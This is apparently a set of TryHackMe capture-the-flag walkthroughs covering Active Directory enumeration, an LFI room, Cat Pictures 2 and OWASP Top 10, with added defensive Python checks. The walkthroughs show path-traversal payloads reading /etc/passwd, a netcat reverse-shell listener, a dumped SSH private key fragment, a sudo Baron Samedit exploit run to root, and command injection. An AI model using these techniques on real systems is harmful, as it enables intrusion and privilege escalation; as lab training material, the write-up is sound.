TryHackMe – Enumerating Active Directory Walkthrough

TryHackMe | Enumerating Active Directory
This room covers various Active Directory enumeration techniques, their use cases as well as drawbacks.
tryhackme.com

This is a walkthrough for TryHackMe “Enumerating Active Directory”.

Task 2

Q1: What native Windows binary allows us to inject credentials legitimately into memory?

A: runas.exe

Q2: What parameter option of the runas binary will ensure that the injected credentials are used for all network connections?

A: /netonly

Q3: What network folder on a domain controller is accessible by any authenticated AD account and stores GPO information?

A: SYSVOL

Q4: When performing dir \\za.tryhackme.com\SYSVOL, what type of authentication is performed by default?

A: Kerberos Authentication

Task 3

Q1: How many Computer objects are part of the Servers OU?

Hint: Use MMC and navigate to the Servers OU.

Follow the steps mentioned in TryHackMe to set up MMC.

Verify the Servers OU.

A: 2

Q2: How many Computer objects are part of the Workstations OU?

Verify the Workstations OU.

A: 1

Q3: How many departments (Organisational Units) does this organisation consist of?

Hint: Look under the People OU for department OUs.

Check the OUs under the People OU.

A: 7

Q4: How many Admin tiers does this organisation have?

Hint: Look under the Admin OU for tier OUs.

Verify the Admins OU.

A: 3

Q5: What is the value of the flag stored in the description attribute of the t0_tinus.green account?

Search for the t0_tinus.green account from Find Users, Contacts, and Groups and check the Description for the flag.

A: THM{Enumerating.Via.MMC}

Task 4

Q1: Apart from the Domain Users group, what other group is the aaron.harris account a member of?

View the aaron.harris account details and review the Global Group memberships entry.

za\david.cook@THMJMP1 C:\Users\david.cook>net user aaron.harris /domain
The request will be processed at a domain controller for domain za.tryhackme.com.

User name                    aaron.harris
Full Name                    Aaron Harris
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            2/24/2022 10:05:11 PM
Password expires             Never
Password changeable          2/24/2022 10:05:11 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users         *Internet Access
The command completed successfully.

A: Internet Access

Q2: Is the Guest account active? (Yay,Nay)

View the Guest account details and review the Account active entry.

za\david.cook@THMJMP1 C:\Users\david.cook>net user Guest /domain
The request will be processed at a domain controller for domain za.tryhackme.com.

User name                    Guest
Full Name
Comment                      Built-in account for guest access to the computer/domain
User's comment
Country/region code          000 (System Default)
Account active               No
Account expires              Never

Password last set            1/31/2025 2:47:20 PM
Password expires             Never
Password changeable          1/31/2025 2:47:20 PM
Password required            No
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships      *Guests
Global Group memberships     *Domain Guests
The command completed successfully.

A: Nay

Q3: How many accounts are a member of the Tier 1 Admins group?

Review the details of the Tier 1 Admins group.

za\david.cook@THMJMP1 C:\Users\david.cook>net group "Tier 1 Admins" /domain
The request will be processed at a domain controller for domain za.tryhackme.com.

Group name     Tier 1 Admins
Comment

Members

-------------------------------------------------------------------------------
t1_arthur.tyler          t1_gary.moss             t1_henry.miller
t1_jill.wallis           t1_joel.stephenson       t1_marian.yates
t1_rosie.bryant
The command completed successfully.

A: 7

Q4: What is the account lockout duration of the current password policy in minutes?

View the password policy and review the Lockout duration entry.

za\david.cook@THMJMP1 C:\Users\david.cook>net accounts /domain
The request will be processed at a domain controller for domain za.tryhackme.com.

Force user logoff how long after time expires?:       Never
Minimum password age (days):                          0
Maximum password age (days):                          Unlimited
Minimum password length:                              0
Length of password history maintained:                None
Lockout threshold:                                    Never
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
Computer role:                                        PRIMARY
The command completed successfully.

A: 30
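The `net accounts /domain` output above is worth reading for more than the lockout duration: it shows a zero minimum length, no expiry, no history and no lockout threshold. As an added example (not part of the room or this walkthrough), the script below parses that output format and reports the settings a defender would want tightened; the thresholds are illustrative assumptions, not a published benchmark.

```python
import re

# Constructed sample: the values the walkthrough's `net accounts /domain`
# output shows for za.tryhackme.com.
SAMPLE_OUTPUT = """\
The request will be processed at a domain controller for domain za.tryhackme.com.

Force user logoff how long after time expires?:       Never
Minimum password age (days):                          0
Maximum password age (days):                          Unlimited
Minimum password length:                              0
Length of password history maintained:                None
Lockout threshold:                                    Never
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
Computer role:                                        PRIMARY
The command completed successfully.
"""

# Assumed baseline for the audit (illustrative thresholds, not a benchmark).
MIN_PASSWORD_LENGTH = 14
MAX_PASSWORD_AGE_DAYS = 365
MIN_HISTORY = 24
MAX_LOCKOUT_THRESHOLD = 10
MIN_LOCKOUT_MINUTES = 15


def parse_net_accounts(text):
    """Turn 'Label:   value' lines into a dict of label -> raw value string."""
    policy = {}
    for line in text.splitlines():
        m = re.match(r"^(.+?):\s{2,}(\S.*?)\s*$", line)
        if m:
            policy[m.group(1).strip()] = m.group(2)
    return policy


def _as_int(value):
    """Integer for numeric values; None for words such as Never/Unlimited/None."""
    return int(value) if value is not None and value.isdigit() else None


def audit_policy(policy):
    """Return human-readable findings; an empty list means nothing looked weak."""
    findings = []

    length = _as_int(policy.get("Minimum password length"))
    if length is None or length < MIN_PASSWORD_LENGTH:
        findings.append(f"minimum password length is {length} (want >= {MIN_PASSWORD_LENGTH})")

    max_age = policy.get("Maximum password age (days)")
    if _as_int(max_age) is None or _as_int(max_age) > MAX_PASSWORD_AGE_DAYS:
        findings.append(f"maximum password age is {max_age} (want <= {MAX_PASSWORD_AGE_DAYS} days)")

    history = policy.get("Length of password history maintained")
    if _as_int(history) is None or _as_int(history) < MIN_HISTORY:
        findings.append(f"password history is {history} (want >= {MIN_HISTORY})")

    threshold = _as_int(policy.get("Lockout threshold"))
    if threshold is None:
        # 'Never' means unlimited guesses: the setting that matters most here.
        findings.append("lockout threshold is Never (unlimited password guessing)")
    elif threshold > MAX_LOCKOUT_THRESHOLD:
        findings.append(f"lockout threshold {threshold} is high (want <= {MAX_LOCKOUT_THRESHOLD})")

    duration = _as_int(policy.get("Lockout duration (minutes)"))
    if duration is not None and duration < MIN_LOCKOUT_MINUTES:
        findings.append(f"lockout duration {duration} min (want >= {MIN_LOCKOUT_MINUTES})")

    return findings


def audit_net_accounts(text):
    """Parse and audit raw `net accounts` output in one call."""
    return audit_policy(parse_net_accounts(text))


if __name__ == "__main__":
    for finding in audit_net_accounts(SAMPLE_OUTPUT):
        print("WEAK:", finding)
```

On the sample above the audit reports four findings; only the 30-minute lockout duration passes, and it is moot while the threshold is Never.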

Task 5

Q1: What is the value of the Title attribute of Beth Nolan (beth.nolan)?

Hint: Use Get-ADUser, remember to set -Properties * to receive all properties.

Check the Title property of the beth.nolan account.

PS C:\Users\david.cook> Get-ADUser -Identity beth.nolan -Server za.tryhackme.com -Properties Title        


DistinguishedName : CN=beth.nolan,OU=Sales,OU=People,DC=za,DC=tryhackme,DC=com
Enabled           : True
GivenName         : Beth
Name              : beth.nolan
ObjectClass       : user
ObjectGUID        : c4ae7c4c-4f98-4366-b3a1-c57debe3256f
SamAccountName    : beth.nolan
SID               : S-1-5-21-3330634377-1326264276-632209373-2760
Surname           : Nolan
Title             : Senior
UserPrincipalName :

A: Senior

Q2: What is the value of the DistinguishedName attribute of Annette Manning (annette.manning)?

Hint: Use Get-ADUser, remember to set -Properties * to receive all properties.

Check the DistinguishedName property of the annette.manning account.

PS C:\Users\david.cook> Get-ADUser -Identity annette.manning -Server za.tryhackme.com -Properties DistinguishedName


DistinguishedName : CN=annette.manning,OU=Marketing,OU=People,DC=za,DC=tryhackme,DC=com
Enabled           : True
GivenName         : Annette
Name              : annette.manning
ObjectClass       : user
ObjectGUID        : 57069bf6-db28-4988-ac9e-0254ca51bb2f
SamAccountName    : annette.manning
SID               : S-1-5-21-3330634377-1326264276-632209373-1257
Surname           : Manning
UserPrincipalName :

A: CN=annette.manning,OU=Marketing,OU=People,DC=za,DC=tryhackme,DC=com

Q3: When was the Tier 2 Admins group created?

Hint: Use Get-ADGroup, remember to set -Properties * to receive all properties. Answer should be in DD/MM/YYYY HH:MM:SS AM/PM format. If you remote from your own local machine and it is in a timezone other than UTC+0 you will have to take timezones into account.

Check the Created property of the Tier 2 Admins group.

PS C:\Users\david.cook> Get-ADGroup -Identity "Tier 2 Admins" -Server za.tryhackme.com -Properties created



Created           : 2/24/2022 10:04:41 PM
DistinguishedName : CN=Tier 2 Admins,OU=Groups,DC=za,DC=tryhackme,DC=com
GroupCategory     : Security
GroupScope        : Global
Name              : Tier 2 Admins
ObjectClass       : group
ObjectGUID        : 6edab731-c305-4959-bd34-4ca1eefe2b3f
SamAccountName    : Tier 2 Admins
SID               : S-1-5-21-3330634377-1326264276-632209373-1104

A: 2/24/2022 10:04:41 PM

Q4: What is the value of the SID attribute of the Enterprise Admins group?

Hint: Use Get-ADGroups, remember to set -Properties * to receive all properties.

Check the SID property of the Enterprise Admins group.

PS C:\Users\david.cook> Get-ADGroup -Identity "Enterprise Admins" -Server za.tryhackme.com -Properties SID
   


DistinguishedName : CN=Enterprise Admins,CN=Users,DC=za,DC=tryhackme,DC=com
GroupCategory     : Security
GroupScope        : Universal
Name              : Enterprise Admins
ObjectClass       : group
ObjectGUID        : 93846b04-25b9-4915-baca-e98cce4541c6
SamAccountName    : Enterprise Admins
SID               : S-1-5-21-3330634377-1326264276-632209373-519

A: S-1-5-21-3330634377-1326264276-632209373-519

Q5: Which container is used to store deleted AD objects?

Hint: Use Get-ADDomain and review the information.

Verify the DeletedObjectsContainer property of the za.tryhackme.com domain.

PS C:\Users\david.cook> Get-ADDomain -Server za.tryhackme.com


ChildDomains                       : {}
ComputersContainer                 : CN=Computers,DC=za,DC=tryhackme,DC=com
DeletedObjectsContainer            : CN=Deleted Objects,DC=za,DC=tryhackme,DC=com

A: CN=Deleted Objects,DC=za,DC=tryhackme,DC=com

Task 6

Q1: What command can be used to execute Sharphound.exe and request that it recovers Session information only from the za.tryhackme.com domain without touching domain controllers?

A: Sharphound.exe --CollectionMethods Session --Domain za.tryhackme.com --ExcludeDCs

Q2: Apart from the krbtgt account, how many other accounts are potentially kerberoastable?

Hint: Use the Pre-Built Analytics Queries.

Copy Sharphound.exe and run it.

PS C:\Users\andrea.mitchell> copy C:\Tools\Sharphound.exe ~\Documents\
PS C:\Users\andrea.mitchell> cd ~\Documents\
PS C:\Users\andrea.mitchell\Documents> .\Sharphound.exe --CollectionMethods All --Domain za.tryhackme.com --ExcludeDCs

At the end of the process, a ZIP file will be created.

PS C:\Users\andrea.mitchell\Documents> dir


    Directory: C:\Users\andrea.mitchell\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        1/31/2025   3:44 PM         121297 20250131154447_BloodHound.zip
-a----        3/16/2022   5:19 PM         906752 Sharphound.exe
-a----        1/31/2025   3:44 PM         359470 YzE4MDdkYjAtYjc2MC00OTYyLTk1YTEtYjI0NjhiZmRiOWY1.bin

Download the ZIP file with the SCP command.

$ scp andrea.mitchell@THMJMP1.za.tryhackme.com:C:/Users/andrea.mitchell/Documents/20250131154447_BloodHound.zip .
andrea.mitchell@thmjmp1.za.tryhackme.com's password: 
20250131154447_BloodHound.zip                                           100%  118KB  59.2KB/s   00:02

Start neo4j and bloodhound, and log in.

$ sudo neo4j console
$ bloodhound

Upload the ZIP file by dragging and dropping it into the bloodhound GUI.

Verify the accounts from Analysis > List all Kerberoastable Accounts.

A: 4

Q3: How many machines do members of the Tier 1 Admins group have administrative access to?

Hint: Search for the Tier 1 Admins group and enumerate its information.

Check Local Admin Rights under Node Info for the Tier 1 Admins group.

A: 2

Q4: How many users are members of the Tier 2 Admins group?

Hint: Search for the Tier 2 Admins group and enumerate its information.

Check Group Members under Node Info for the Tier 2 Admins group.

A: 15

TryHackMe – Lo-Fi Walkthrough

TryHackMe | Lo-Fi
Want to hear some lo-fi beats, to relax or study to? We’ve got you covered!
tryhackme.com

This is a walkthrough for TryHackMe “Lo-Fi”.

Task 1

Q1: Climb the filesystem to find the flag!

Perform a port scan.

$ nmap -Pn -T4 -sVC -A -p- 10.10.174.194 -oN nmap_result
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 a5:97:85:99:30:80:e2:7b:02:b1:ac:c9:65:e1:9d:05 (RSA)
|   256 e8:dc:f6:8d:84:fa:ab:0d:80:77:23:47:78:f4:31:ad (ECDSA)
|_  256 24:82:a1:9c:a6:3b:38:58:52:c2:21:13:25:86:55:f8 (ED25519)
80/tcp    open     http    Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Lo-Fi Music
|_http-server-header: Apache/2.2.22 (Ubuntu)

The open ports are now known.

Port  Service  Version
22    ssh      OpenSSH 8.2p1
80    http     Apache/2.2.22

Access port 80.

When you click the Discography link, the file specified by ?page= is loaded.

It looks like LFI is possible.
I was able to load /etc/passwd as follows: ?page=../../../../../../etc/passwd

I was able to get the flag at ?page=../../../../../../flag.txt.

A: flag{e4478e0eab69bd642b8238765dcb7d18}
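The `?page=` include that made this LFI possible, shown two ways as an added example (this is not the Lo-Fi site's code, and the page names and directory layout are assumptions): `load_page_vulnerable` joins the parameter straight onto the include directory, so `../` walks out of it, while `load_page_safe` treats the parameter as a page name, allow-lists it and confirms the resolved path stays inside the directory. `looks_like_traversal` is the matching check for the `page` parameter in access logs.

```python
import os
import tempfile
from urllib.parse import unquote

# Constructed sample site layout: pages/ holds the real includes, and a file
# one level up stands in for /etc/passwd or flag.txt outside the web root.
ROOT = tempfile.mkdtemp()
PAGES_DIR = os.path.join(ROOT, "pages")
os.makedirs(PAGES_DIR)
with open(os.path.join(PAGES_DIR, "discography.php"), "w") as fh:
    fh.write("<h1>Discography</h1>")
with open(os.path.join(ROOT, "flag.txt"), "w") as fh:
    fh.write("constructed-flag-value")

# The only page names the application should ever serve (assumed).
ALLOWED_PAGES = {"home", "discography", "about"}


def load_page_vulnerable(page):
    """The pattern behind ?page=: the parameter is joined straight onto the
    include directory, so '../' walks out of it."""
    with open(os.path.join(PAGES_DIR, page)) as fh:
        return fh.read()


def resolve_page_safe(page):
    """Map a page *name* to a file inside PAGES_DIR, or return None."""
    if page not in ALLOWED_PAGES:
        return None
    base = os.path.realpath(PAGES_DIR)
    candidate = os.path.realpath(os.path.join(base, page + ".php"))
    # Defence in depth: even an allow-listed name must resolve (symlinks
    # followed) to a path that still sits under the include directory.
    if os.path.commonpath([candidate, base]) != base:
        return None
    return candidate


def load_page_safe(page):
    """Serve the page, or None when the request is rejected."""
    path = resolve_page_safe(page)
    if path is None or not os.path.isfile(path):
        return None
    with open(path) as fh:
        return fh.read()


def looks_like_traversal(page_param):
    """Log-side check for ?page= values like the ones used above; the value
    is URL-decoded first so %2e%2e%2f is caught as well."""
    decoded = unquote(page_param)
    parts = decoded.replace("\\", "/").split("/")
    return ".." in parts or decoded.startswith("/")
```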

TryHackMe – Cat Pictures 2 Walkthrough

TryHackMe | Cat Pictures 2
Now with more Cat Pictures!
tryhackme.com

This is a walkthrough for TryHackMe “Cat Pictures 2”.

Task 2

Q1: What is Flag 1?

Perform a port scan.

$ nmap -Pn -T4 -sVC -A -p- 10.10.224.89 -oN nmap_result
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 33:f0:03:36:26:36:8c:2f:88:95:2c:ac:c3:bc:64:65 (RSA)
|   256 4f:f3:b3:f2:6e:03:91:b2:7c:c0:53:d5:d4:03:88:46 (ECDSA)
|_  256 13:7c:47:8b:6f:f8:f4:6b:42:9a:f2:d5:3d:34:13:52 (ED25519)
80/tcp   open  http    nginx 1.4.6 (Ubuntu)
|_http-title: Lychee
| http-robots.txt: 7 disallowed entries 
|_/data/ /dist/ /docs/ /php/ /plugins/ /src/ /uploads/
|_http-server-header: nginx/1.4.6 (Ubuntu)
| http-git: 
|   10.10.224.89:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|     Remotes:
|       https://github.com/electerious/Lychee.git
|_    Project type: PHP application (guessed from .gitignore)
222/tcp  open  ssh     OpenSSH 9.0 (protocol 2.0)
| ssh-hostkey: 
|   256 be:cb:06:1f:33:0f:60:06:a0:5a:06:bf:06:53:33:c0 (ECDSA)
|_  256 9f:07:98:92:6e:fd:2c:2d:b0:93:fa:fe:e8:95:0c:37 (ED25519)
1337/tcp open  waste?
| fingerprint-strings: 
|   GenericLines: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Accept-Ranges: bytes
|     Content-Length: 3858
|     Content-Type: text/html; charset=utf-8
|     Date: Mon, 27 Jan 2025 12:38:17 GMT
|     Last-Modified: Wed, 19 Oct 2022 15:30:49 GMT
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>OliveTin</title>
|     <link rel = "stylesheet" type = "text/css" href = "style.css" />
|     <link rel = "shortcut icon" type = "image/png" href = "OliveTinLogo.png" />
|     <link rel = "apple-touch-icon" sizes="57x57" href="OliveTinLogo-57px.png" />
|     <link rel = "apple-touch-icon" sizes="120x120" href="OliveTinLogo-120px.png" />
|     <link rel = "apple-touch-icon" sizes="180x180" href="OliveTinLogo-180px.png" />
|     </head>
|     <body>
|     <main title = "main content">
|     <fieldset id = "section-switcher" title = "Sections">
|     <button id = "showActions">Actions</button>
|     <button id = "showLogs">Logs</but
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Accept-Ranges: bytes
|     Content-Length: 3858
|     Content-Type: text/html; charset=utf-8
|     Date: Mon, 27 Jan 2025 12:38:18 GMT
|     Last-Modified: Wed, 19 Oct 2022 15:30:49 GMT
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>OliveTin</title>
|     <link rel = "stylesheet" type = "text/css" href = "style.css" />
|     <link rel = "shortcut icon" type = "image/png" href = "OliveTinLogo.png" />
|     <link rel = "apple-touch-icon" sizes="57x57" href="OliveTinLogo-57px.png" />
|     <link rel = "apple-touch-icon" sizes="120x120" href="OliveTinLogo-120px.png" />
|     <link rel = "apple-touch-icon" sizes="180x180" href="OliveTinLogo-180px.png" />
|     </head>
|     <body>
|     <main title = "main content">
|     <fieldset id = "section-switcher" title = "Sections">
|     <button id = "showActions">Actions</button>
|_    <button id = "showLogs">Logs</but
3000/tcp open  ppp?
| fingerprint-strings: 
|   GenericLines, Help, RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Cache-Control: no-store, no-transform
|     Content-Type: text/html; charset=UTF-8
|     Set-Cookie: i_like_gitea=42014f0627fe12cd; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=pjYVqyeTIH6ENhaDCfTa9aeCQ6Y6MTczNzk4MTQ5Nzg4Mjc4NzIyMw; Path=/; Expires=Tue, 28 Jan 2025 12:38:17 GMT; HttpOnly; SameSite=Lax
|     Set-Cookie: macaron_flash=; Path=/; Max-Age=0; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Mon, 27 Jan 2025 12:38:17 GMT
|     <!DOCTYPE html>
|     <html lang="en-US" class="theme-">
|     <head>
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <title> Gitea: Git with a cup of tea</title>
|     <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiR2l0ZWE6IEdpdCB3aXRoIGEgY3VwIG9mIHRlYSIsInNob3J0X25hbWUiOiJHaXRlYTogR2l0IHdpdGggYSBjdXAgb2YgdGVhIiwic3RhcnRfdXJsIjoiaHR0cDovL2xvY2FsaG9zdDozMDAwLyIsImljb25zIjpbeyJzcmMiOiJodHRwOi
|   HTTPOptions: 
|     HTTP/1.0 405 Method Not Allowed
|     Cache-Control: no-store, no-transform
|     Set-Cookie: i_like_gitea=0accb03d95b3c415; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=rPlj3mCHTQlsR2i2JNfafjWPIYs6MTczNzk4MTUwNDE2MjI5OTQzOQ; Path=/; Expires=Tue, 28 Jan 2025 12:38:24 GMT; HttpOnly; SameSite=Lax
|     Set-Cookie: macaron_flash=; Path=/; Max-Age=0; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Mon, 27 Jan 2025 12:38:24 GMT
|_    Content-Length: 0
8080/tcp open  http    SimpleHTTPServer 0.6 (Python 3.6.9)
|_http-title: Welcome to nginx!
|_http-server-header: SimpleHTTP/0.6 Python/3.6.9

The open ports are now known.

Port  Service  Version
22    ssh      OpenSSH 7.6p1
80    http     nginx 1.4.6
222   ssh      OpenSSH 9.0
1337  waste?
3000  ppp?
8080  http     SimpleHTTPServer 0.6

When I accessed port 80, I could see an application that allows me to publish photos.

I found out from the login screen that Lychee 3.1.1 is in use.

Access port 1337.

It seems that shell commands and an Ansible playbook can be executed here.

I found that OliveTin is used here.

On port 3000, Gitea is running.

Register an account with Gitea.
The samarium repository could not be confirmed.

Look at port 80.
Download the cat images from Direct Link.

When I checked the metadata, I found a path on port 8080.

$ exiftool f5054e97620f168c7b5088c85ab1d6e4.jpg

(omitted)

Title                           : :8080/764efa883dda1e11db47671c4a3bbd9e.txt

I was able to get the credentials to access Gitea.

When I logged in, I was able to access the ansible repository.

I was able to get the flag from flag1.txt.

A: 10d916eaea54bb5ebe36b59538146bb5

Q2: What is Flag 2?

Hint: Ansible!

I was able to check what Ansible executes from playbook.yaml.

It seems that Ansible allows you to run shell commands in the shell module.

Edit playbook.yaml from the Gitea repository.
Replace it with a ping command and try running it from Run Ansible Playbook on port 1337.

Since the packet was received, I knew that the change in Gitea was reflected.

$ sudo tcpdump -i tun0 icmp                                                
[sudo] password for kali: 
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
08:33:05.537596 IP 10.10.224.89 > 10.6.55.144: ICMP echo request, id 3915, seq 1, length 64
08:33:05.537608 IP 10.6.55.144 > 10.10.224.89: ICMP echo reply, id 3915, seq 1, length 64

Change the shell module to a reverse shell payload.

Listening with Netcat and running Run Ansible Playbook again, I was able to get a shell as bismuth.

$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.6.55.144] from (UNKNOWN) [10.10.224.89] 37402
bismuth@catpictures-ii:~$ whoami
whoami
bismuth
bismuth@catpictures-ii:~$

I was able to get the SSH private key from /home/bismuth/.ssh/id_rsa.

bismuth@catpictures-ii:~$ cat .ssh/id_rsa
cat .ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEA2epfgbqSrWGvHLh3a3K2X/6flpaL2ccuKMjnkBfxJhPK721K
uuqJIyB0iMoWmBFo+10TX3L8LRd5rgVKiTyv0QhVcHX2tFK5ma88a2xAuaMe5BJP
DwDkVfS2lnxgfBO9U4d73IK7963QwMF3u98bueJZkKkrFr4jfvbkDJOP24a95H4v

(omitted)

SSH connection succeeded with private key.

$ ssh -i id_rsa bismuth@10.10.224.89
bismuth@catpictures-ii:~$

I was able to get the flag from /home/bismuth/flag2.txt.

$ cat flag2.txt 
5e2cafbbf180351702651c09cd797920

A: 5e2cafbbf180351702651c09cd797920

Q3: What is Flag 3?

When enumerating with linpeas, information about CVE-2021-3156 came out.

[+] [CVE-2021-3156] sudo Baron Samedit

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: mint=19,[ ubuntu=18|20 ], debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit 2

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
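linpeas flags CVE-2021-3156 from the distribution tags; the same screen can be done from a `sudo --version` banner across a fleet. Added example, not from the room or from linpeas: the affected ranges are the ones in the Qualys advisory linked above (legacy 1.8.2 through 1.8.31p2, stable 1.9.0 through 1.9.5p1). Distributions backport fixes without bumping the upstream version, so a hit is a prompt to check the package changelog, not proof on its own.

```python
import re

# Affected versions per the Qualys advisory (inclusive), as
# (major, minor, patch, p-level) tuples.
VULNERABLE_RANGES = (
    ((1, 8, 2, 0), (1, 8, 31, 2)),   # legacy 1.8.x branch
    ((1, 9, 0, 0), (1, 9, 5, 1)),    # stable 1.9.x branch
)

_VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?")


def parse_sudo_version(banner):
    """'Sudo version 1.8.31p2' -> (1, 8, 31, 2); a missing 'p' level is 0."""
    m = _VERSION_RE.search(banner)
    if not m:
        raise ValueError(f"no sudo version found in {banner!r}")
    major, minor, patch, plevel = m.groups()
    return (int(major), int(minor), int(patch), int(plevel or 0))


def vulnerable_to_cve_2021_3156(banner):
    """True when the version string falls inside an affected range."""
    version = parse_sudo_version(banner)
    return any(lo <= version <= hi for lo, hi in VULNERABLE_RANGES)


# Constructed sample banners (first line of `sudo --version` on each host).
SAMPLE_BANNERS = [
    "Sudo version 1.8.21",     # the sudo line in the PoC's Ubuntu 18.04 target
    "Sudo version 1.9.5p2",    # first fixed stable release
]

if __name__ == "__main__":
    for banner in SAMPLE_BANNERS:
        state = "VULNERABLE" if vulnerable_to_cve_2021_3156(banner) else "fixed"
        print(f"{banner} -> {state}")
```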

The blasty CVE-2021-3156 PoC listed in the linpeas output above was used for the attack.

Download the PoC to Kali and transfer it from Kali to the target machine.

Build it.

$ make
rm -rf libnss_X
mkdir libnss_X
gcc -std=c99 -o sudo-hax-me-a-sandwich hax.c
gcc -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c

Determine the target number for the operating system.

$ ./sudo-hax-me-a-sandwich

** CVE-2021-3156 PoC by blasty <peter@haxx.in>

  usage: ./sudo-hax-me-a-sandwich <target>

  available targets:
  ------------------------------------------------------------
    0) Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27
    1) Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31
    2) Debian 10.0 (Buster) - sudo 1.8.27, libc-2.28
  ------------------------------------------------------------

  manual mode:
    ./sudo-hax-me-a-sandwich <smash_len_a> <smash_len_b> <null_stomp_len> <lc_all_len>

When I ran the PoC, I succeeded in privilege escalation.

$ ./sudo-hax-me-a-sandwich 0

** CVE-2021-3156 PoC by blasty <peter@haxx.in>

using target: Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27 ['/usr/bin/sudoedit'] (56, 54, 63, 212)
** pray for your rootshell.. **
[+] bl1ng bl1ng! We got it!
# whoami 
root

I was able to get the flag from /root/flag3.txt.

# cat /root/flag3.txt
6d2a9f8f8174e86e27d565087a28a971

A: 6d2a9f8f8174e86e27d565087a28a971

TryHackMe – OWASP TOP 10 – 2021 Walkthrough

This is a walkthrough of TryHackMe “OWASP Top 10 – 2021”.

TryHackMe | OWASP Top 10 – 2021
Learn about and exploit each of the OWASP Top 10 vulnerabilities; the 10 most critical web security risks.
tryhackme.com

Task 4

Q2: Deploy the machine and go to http://MACHINE_IP – Login with the username noot and the password test1234.

Launch the target machine, visit the website, and you will see a login form.

Log in with Username: noot, Password: test1234.

Q3: Look at other users’ notes. What is the flag?

Hint: The URL contains ?note_id=1 – I wonder what happens if you change the parameter value? You might be able to access another user’s notes.

It seems that the note with the number specified in the note_id parameter is displayed, as with note_id=1.

You can get another note's data by specifying note_id=0, and you get the flag.

A: flag{fivefourthree}

Task 8

Q1: What is the name of the mentioned directory?

Hint: Have a look at the source code on the /login page.

Access port 81.

I found the /assets path in the source code of /login.php.

A: /assets

Q2: Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data?

Accessing /assets, I found webapp.db.

A: webapp.db

Q3: Use the supporting material to access the sensitive data. What is the password hash of the admin user?

When I downloaded webapp.db and checked the data, I found the account name and password hash value.

A: 6eea9b7ef19179a06954edd0f6c05ceb

Q4: What is the admin’s plaintext password?

Hint: Read the supporting material.

An online hash lookup site was used to analyze the hash value.

The admin password hash was successfully analyzed, and the plaintext password became known.

A: qwertyuiop

Q5: Log in as the admin. What is the flag?

I was able to get the flag when I logged in at /login.php with Username: admin, Password: qwertyuiop.

A: THM{Yzc2YjdkMjE5N2VjMzNhOTE3NjdiMjdl}

Task 10

Q1: What strange text file is in the website’s root directory?

Access port 82.

Command injection with $() was successful.

I was able to check the file structure with $(ls).

A: drpepper.txt

Q2: How many non-root/non-service/non-daemon users are there?

Confirm from /etc/passwd.

A: 0

Q3: What user is this app running as?

Confirm with the whoami command.

A: apache

Q4: What is the user’s shell set as?

Confirm from /etc/passwd.

A: /sbin/nologin

Q5: What version of Alpine Linux is running?

Hint: The version can be found in “/etc/alpine-release”.

Confirm from /etc/alpine-release.

A: 3.16.0

Task 11

Q2: What is the value of the flag in joseph’s account?

Hint: Is there any security question that can be easily guessed?

Access port 85.

I don’t know the password for joseph, so I will try to change the password from /resetpass1.php.

There are three secret questions, but favorite color seems easy to guess.

When you finally enter green, a new password is issued, so make a note of it.

You have successfully logged in with the new password.

I was able to get the flag from a text file.

A: THM{Not_3ven_c4tz_c0uld_sav3_U!}

Task 12

Q1: Navigate to http://TARGET_IP:86/console to access the Werkzeug console.

When I accessed /console, I could see the Werkzeug console.

Q2: What is the database file name (the one with the .db extension) in the current directory?

